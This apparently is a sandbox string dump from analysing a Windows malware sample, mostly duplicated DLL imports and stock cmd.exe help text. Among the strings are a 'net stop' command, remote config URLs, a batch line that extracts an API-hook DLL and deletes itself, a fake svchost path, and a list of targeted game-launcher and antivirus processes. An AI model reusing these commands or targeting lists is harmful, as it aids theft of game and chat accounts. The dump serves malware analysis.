HTTP/1.1 200 OK
HTTP/1.1 200 OK
cmd /c net stop
cmd /c net stop
http://597play.com/stopser.txt
http://597play.com/stopser.txt
http://597play.com/lookjc.txt
http://597play.com/lookjc.txt
c:\windows\nsink.txt
c:\windows\nsink.txt
http://16945.5258.net
http://16945.5258.net
http://*hao123.com*
http://*hao123.com*
http://*baidu.com*
http://*baidu.com*
{1234567456712415}
{1234567456712415}
{987-654-321-cba}
{987-654-321-cba}
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
ole32.dll
ole32.dll
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
RASAPI32.dll
RASAPI32.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
EnumWindows
EnumWindows
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
WSOCK32.dll
WSOCK32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
USER32.DLL
USER32.DLL
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s <%s>
%s <%s>
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
t.exe
t.exe
aft launcher.exe
aft launcher.exe
lolclient.exe
lolclient.exe
launcher.exe
launcher.exe
QQlogin.exe
QQlogin.exe
DNFchina.exe
DNFchina.exe
World of Warcraft Launcher.exe
World of Warcraft Launcher.exe
my.exe
my.exe
xy2.exe
xy2.exe
360Safe.exe
360Safe.exe
360sd.exe
360sd.exe
crossfire.exe
crossfire.exe
LOLBox.exe
LOLBox.exe
LolClient.exe
LolClient.exe
%System%\svchost.exe
%System%\svchost.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
(*.*)
(*.*)
cmd.exe_304:
.text
.text
`.data
`.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
SetConsoleInputExeNameW
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MPR.dll
MPR.dll
RegEnumKeyW
RegEnumKeyW
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ShellExecuteExW
ShellExecuteExW
CmdBatNotification
CmdBatNotification
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
_pipe
_pipe
GetProcessWindowStation
GetProcessWindowStation
cmd.pdb
cmd.pdb
CMD Internal Error %s
CMD Internal Error %s
)(&&())))(&))
)(&&())))(&))
)&((&)&))&())
)&((&)&))&())
)&((&)&)&()))
)&((&)&)&()))
)(&&()))&))))
)(&&()))&))))
CMD.EXE
CMD.EXE
()|&=,;"
()|&=,;"
COPYCMD
COPYCMD
\XCOPY.EXE
\XCOPY.EXE
CMDCMDLINE
CMDCMDLINE
WKERNEL32.DLL
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
Software\Policies\Microsoft\Windows\System
0123456789
0123456789
cmd.exe
cmd.exe
DIRCMD
DIRCMD
%d.%d.d
%d.%d.d
Ungetting: '%s'
Ungetting: '%s'
DisableCMD
DisableCMD
GeToken: (%x) '%s'
GeToken: (%x) '%s'
%s\Shell\Open\Command
%s\Shell\Open\Command
%x %c
%x %c
*** Unknown type: %x
*** Unknown type: %x
Args: `%s'
Args: `%s'
Cmd: %s Type: %x
Cmd: %s Type: %x
%s (%s) %s
%s (%s) %s
tcher.exe" && @"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\"kw.* >nul 2>nul && exit
tcher.exe" && @"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\"kw.* >nul 2>nul && exit
%System%\ping.exe
%System%\ping.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp>
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp>
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
atcher.exe" && @"%~dp0KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "%~dp0"kw.* >nul 2>nul && exit
atcher.exe" && @"%~dp0KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "%~dp0"kw.* >nul 2>nul && exit
CMDEXTVERSION
CMDEXTVERSION
KEYS
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
operable program or batch file.
operable program or batch file.
%s %s
%s %s
(%s) %s
(%s) %s
%s %s%s
%s %s%s
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
d%sd%s
d%sd%s
-%sd%sd%sd
-%sd%sd%sd
d%sd%sd
d%sd%sd
%s=%s
%s=%s
X-X
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
<> -*/%()|^&=,
\CMD.EXE
\CMD.EXE
Windows Command Processor
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Cmd.Exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Press any key to continue . . . %0
Press any key to continue . . . %0
The system cannot execute the specified program.
The system cannot execute the specified program.
and press any key when ready. %0
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
Microsoft Windows XP [Version %1]%0
a pipe operation.
a pipe operation.
KEYS is on.
KEYS is on.
KEYS is off.
KEYS is off.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
Changes the cmd.exe command prompt.
$B | (pipe)
$B | (pipe)
$V Windows XP version number
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
parameters These are the parameters passed to the command/program
under Windows XP.
under Windows XP.
Starts a new instance of the Windows XP command interpreter
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
variable var at execution time. The %var% syntax expands variables
of an executable file.
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
The restartable option to the COPY command is not supported by
this version of the operating system.
this version of the operating system.
The following usage of the path operator in batch-parameter
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
! ~ - - unary operators
* / %% - arithmetic operators
* / %% - arithmetic operators
- - arithmetic operators
- - arithmetic operators
&= ^= |= <<= >>=
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
%%4 %%5 ...)
CMD /? for details.
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
command execution.
non-executable files may be invoked through their file association just
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
different parsing options. The keywords are:
be passed to the for body for each iteration.
be passed to the for body for each iteration.
where a back quoted string is executed as a
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
to create temporary drive letter to support UNC current
Missing operand.
Missing operand.
Missing operator.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
application execution.
The switch /Y may be present in the COPYCMD environment variable.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
svchost.exe_1724:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
ping.exe_552:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
iphlpapi.dll
iphlpapi.dll
USER32.dll
USER32.dll
WS2_32.dll
WS2_32.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
ping.pdb
ping.pdb
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
TCP/IP Ping Command
TCP/IP Ping Command
5.1.2600.5512 (xpsp.080413-0852)
5.1.2600.5512 (xpsp.080413-0852)
ping.exe
ping.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Destination port unreachable.
Destination port unreachable.
Unable to initialize Windows Sockets interface, error code %1!d!.
Unable to initialize Windows Sockets interface, error code %1!d!.
%1 [%2] %0
%1 [%2] %0
%1 [%2] : %0
%1 [%2] : %0